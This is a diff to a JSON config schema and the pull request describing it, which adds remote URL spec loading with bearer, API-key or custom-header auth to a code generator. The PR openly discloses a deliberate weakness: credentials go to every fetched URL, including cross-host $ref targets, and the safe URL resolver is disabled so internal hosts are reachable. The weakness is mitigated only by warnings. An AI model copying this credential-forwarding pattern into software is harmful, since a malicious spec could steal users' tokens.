@@ -78,6 +81,9 @@
                     "type": "string",
                     "markdownDescription": "Path or URL to the input document used as the source for code generation. [Read more about configurations here](https://the-codegen-project.org/docs/configurations)"
                 },
+                "auth": {
+                    "$ref": "#/definitions/AsyncAPICodegenConfiguration/properties/auth"
+                },
                 "language": {
                     "$ref": "#/definitions/AsyncAPICodegenConfiguration/properties/language"
                 },
@@ -123,6 +129,72 @@
                 "inputPath": {
                     "type": "string",
                     "markdownDescription": "Path or URL to the input document used as the source for code generation. [Read more about configurations here](https://the-codegen-project.org/docs/configurations)"
+                },
+                "auth": {
+                    "anyOf": [
+                        {
+                            "type": "object",
+                            "properties": {
+                                "type": {
+                                    "type": "string",
+                                    "const": "bearer"
+                                },
+                                "token": {
+                                    "type": "string",
+                                    "minLength": 1
+                                }
+                            },
+                            "required": [
+                                "type",
+                                "token"
+                            ],
+                            "additionalProperties": false
+                        },
+                        {
+                            "type": "object",
+                            "properties": {
+                                "type": {
+                                    "type": "string",
+                                    "const": "apiKey"
+                                },
+                                "header": {
+                                    "type": "string",
+                                    "minLength": 1
+                                },
+                                "value": {
+                                    "type": "string",
+                                    "minLength": 1
+                                }
+                            },
+                            "required": [
+                                "type",
+                                "header",
+                                "value"
+                            ],
+                            "additionalProperties": false
+                        },
+                        {
+                            "type": "object",
+                            "properties": {
+                                "type": {
+                                    "type": "string",
+                                    "const": "custom"
+                                },
+                                "headers": {
+                                    "type": "object",
+                                    "additionalProperties": {
+                                        "type": "string"
+                                    }
+                                }
+                            },
+                            "required": [
+                                "type",
+                                "headers"
+                            ],
+                            "additionalProperties": false
+                        }
+                    ],
+                    "markdownDescription": "Authentication for fetching remote input specifications via http(s). Ignored for local file paths. WARNING: these credentials are sent to every URL the loader fetches, including external $ref targets on other hosts. See https://the-codegen-project.org/docs/configurations#auth-scope-and-security-considerations for details."
                 },
                 "language": {
                     "type": "string",


### PR DESCRIPTION
## Summary

Adds support for loading AsyncAPI, OpenAPI, and JSON Schema specs from `http(s)://` URLs in `inputPath`, with optional authentication (`bearer` / `apiKey` / custom headers). Cross-spec `$ref`s on the same and different hosts are resolved through the same auth-aware HTTP path. Closes #359.

## Type of Change

- [x] New feature (adds functionality)
- [x] Documentation update
- [ ] Bug fix
- [ ] Breaking change
- [ ] Performance improvement
- [ ] Refactoring (no functional changes)
- [ ] Test improvements

## Related Issues

Closes #359 — prerequisite for the EventCatalog integration that needs to fetch authenticated specs.

## Changes Made

### New source files
- `src/utils/inputSource.ts` — `isRemoteUrl` / `getInputSourceType` (canonical URL-detection helper; telemetry now re-exports from here).
- `src/utils/remoteFetch.ts` — `fetchRemoteDocument(url, auth?, options?)` using Node 22's global `fetch`, with `AbortController`-based timeout, redirect-follow, and typed errors.
- `src/utils/refResolvers.ts` — `createOpenapiRefParserResolver(auth, ctx)` and `createAsyncapiResolvers(auth, ctx)` so cross-spec `$ref`s flow through the same auth + debug-log + cross-host-warning pipeline.

### Modified source
- `src/codegen/types.ts` — adds `zodInputAuth` (discriminated union spread into all three input branches), `InputAuthConfig`, and `RunGeneratorContext.inputAuth`.
- `src/codegen/configurations.ts` — URL passthrough (bypass `path.resolve` for http(s)://) and threads `context.inputAuth` from config.
- `src/codegen/errors.ts` — `createRemoteFetchError` with status-specific help (401/403 → auth, 404 → URL, 429 → rate-limit, network → connectivity, timeout → timeout). `createInputDocumentError` no longer suggests "valid JSON file" for URL paths.
- `src/codegen/inputs/asyncapi/parser.ts` — URL fetch + per-call `Parser` with `__unstable.resolver` resolvers when auth is present (singleton preserved for the no-auth/local-file path).
- `src/codegen/inputs/openapi/parser.ts` — URL fetch + Content-Type-driven parse + `$RefParser.dereference` with our auth-aware http resolver. `safeUrlResolver: false` so internal/loopback hosts work.
- `src/codegen/inputs/jsonschema/parser.ts` — URL fetch with Content-Type → URL extension → JSON-then-YAML fallback. `loadJsonSchema` and `loadJsonSchemaDocument` deduplicated.
- `src/commands/generate.ts` — watch mode skips chokidar for URL inputs and logs a one-shot warning; `--watchPath` still works.
- `src/telemetry/anonymize.ts` — re-exports `getInputSourceType` from the canonical helper (no telemetry semantics change).

### Tests (TDD: written first, verified failing, then passing)
- `test/utils/inputSource.spec.ts` — URL-detection truth table.
- `test/utils/remoteFetch.spec.ts` — auth headers (bearer / apiKey / custom), status codes, AbortError → timeout help, network failures, redirect-follow.
- `test/utils/refResolvers.spec.ts` — both factories, debug log, cross-host info-level warning emitted exactly once per distinct cross-host destination.
- `test/codegen/configurations.spec.ts` — URL passthrough (no `path.resolve`), `inputAuth` threaded onto context, Zod accepts each `auth` shape, rejects invalid shapes.
- `test/codegen/inputs/asyncapi.spec.ts` — new file: URL load + auth + 401 propagation.
- `test/codegen/inputs/openapi.spec.ts` — extended with URL load + auth + Content-Type-driven JSON/YAML + extension fallback + 404.
- `test/codegen/inputs/jsonschema.test.ts` — extended with URL load + auth + Content-Type/YAML + ambiguous-content-type fallback.
- `test/codegen/inputs/__helpers__/httpServer.ts` — real local `http.createServer` test helper with header-checking middleware.
- `test/codegen/inputs/remote-url.e2e.spec.ts` — 7-case end-to-end suite against real HTTP servers, including same-host `$ref` auth, cross-host warning, and 401 on root.

### Documentation
- `docs/configurations.md` — new "Remote URL inputs" section with examples for the three auth shapes, plus the canonical "Auth scope and security considerations" section (compromised-spec example, debug/info log behavior, deferred mitigations list).
- `docs/inputs/asyncapi.md`, `docs/inputs/openapi.md`, `docs/inputs/jsonschema.md` — short callouts linking to the canonical security section.
- JSON schemas regenerated; the security WARNING flows into `markdownDescription` and surfaces in IDE tooltips and the playground's Monaco autocomplete.

### Dependencies
- `@types/node` bumped to `^22` (matches `engines.node`).
- `@apidevtools/json-schema-ref-parser` promoted from transitive (via `@readme/openapi-parser`) to direct dependency at `^14.2.0`.
- No new HTTP-client dependency (Node 22 global `fetch`).

## Key Implementation Details

### Auth scope (D8) — same headers go to every fetched URL

When `auth` is configured, the headers are sent to **every** URL the loader fetches — root + every `$ref` target, regardless of host. This is the right default for typical internal-SSO setups but means a compromised spec can exfiltrate the token via an external `$ref`. Mitigations shipped today:

1. Per-URL **debug log** (`[remote-fetch] GET <url>`).
2. **Info-level warning** when a `$ref` host differs from the root host: `[remote-fetch] auth headers sent to '<host>' while resolving $ref from '<root-host>'`.
3. **Schema-level warning** in `zodInputAuth.describe(...)` so it shows in IDE tooltips.

Per-host auth maps and an auth-host allowlist are deferred to follow-up issues; documented inline.

### Browser & playground

The browser path passes spec content directly with a virtual `inputPath` and never invokes `fetchRemoteDocument`, so URL fetching is correctly Node-only. Esbuild tree-shakes out the URL helpers from the bundle (verified: `grep -c fetchRemoteDocument` returns 0). The new `zodInputAuth` schema is bundled so the playground accepts the `auth` field, with the security warning surfacing in Monaco autocomplete via `markdownDescription`.

## Testing

### `npm run prepare:pr`
All steps green: build, format, lint:fix, test:update, runtime:typescript:generate.

### Unit + integration tests
```
Test Suites: 49 passed, 49 total
Tests:       1 skipped, 625 passed, 626 total
```

### Browser tests (`test/browser/`)
```
Test Suites: 4 passed
Tests:       60 passed
```

### Browser bundle smoke test
Loaded `dist/browser/codegen.browser.mjs` in Node with browser-globals shims; `generate()` produced a TypeScript payload from an AsyncAPI 2.6 spec; `parseConfig()` round-tripped a config with `auth: {type: 'bearer'}`.

### Docusaurus website build
`SUCCESS` (pre-existing broken-link warnings on the website are unrelated to this PR).

### Runtime generate (local-path regression)
All four runtime configs regenerated successfully — regular: 19 files, request-reply: 16, openapi: 18, payload-types: 60.

## Documentation

- [x] `docs/configurations.md` — Remote URLs + Auth scope + watch-mode notes.
- [x] `docs/inputs/{asyncapi,openapi,jsonschema}.md` — short callouts.
- [x] JSDoc on all new public functions.
- [x] JSON schema description carries the security WARNING (verified in `schemas/configuration-schema-0-with-docs.json`).

## Breaking Changes

**None.** Every existing test using a local `inputPath` still passes unchanged. The new `auth` field is optional and ignored for local file paths.

## Performance Impact

- No-auth + local-file path: unchanged (the AsyncAPI `Parser` singleton is reused; OpenAPI keeps the existing `@readme/openapi-parser.dereference` flow for local files).
- URL path: one fetch per document/`$ref`; default 30 s timeout; redirect-follow.
- Browser bundle size: unchanged shape (URL helpers are tree-shaken out).

## Checklist

- [x] Code follows project conventions (Conventional Commits, no Claude attribution)
- [x] All tests pass (unit, blackbox via `prepare:pr`, browser, runtime generate sanity)
- [x] Documentation updated
- [x] No TypeScript errors (source + tests)
- [x] Lint passes (`--max-warnings 0`)
- [x] Build succeeds (CLI + browser bundle)
- [x] `npm run prepare:pr` green
- [x] Follows existing patterns
- [x] Backward compatible with local-file inputs

## Examples

### Bearer token
```javascript
export default {
  inputType: 'asyncapi',
  inputPath: 'https://api.example.com/specs/asyncapi.yaml',
  language: 'typescript',
  auth: { type: 'bearer', token: process.env.API_TOKEN },
  generators: [
    { preset: 'payloads', outputPath: './src/payloads' }
  ]
};
```

### API key in a custom header
```javascript
auth: { type: 'apiKey', header: 'X-API-Key', value: process.env.API_KEY }
```

### Arbitrary headers
```javascript
auth: {
  type: 'custom',
  headers: {
    Authorization: `Bearer ${process.env.API_TOKEN}`,
    'X-Tenant': 'acme'
  }
}
```

## Follow-ups (deferred per plan, not blocking)

- Per-host auth maps: `auth: { 'api.acme.com': {...}, 'schemas.acme.com': {...} }`.
- Auth-host allowlist: `authHosts: [...]` to scope headers to listed hosts only.
- Disabling external `$ref` resolution entirely.
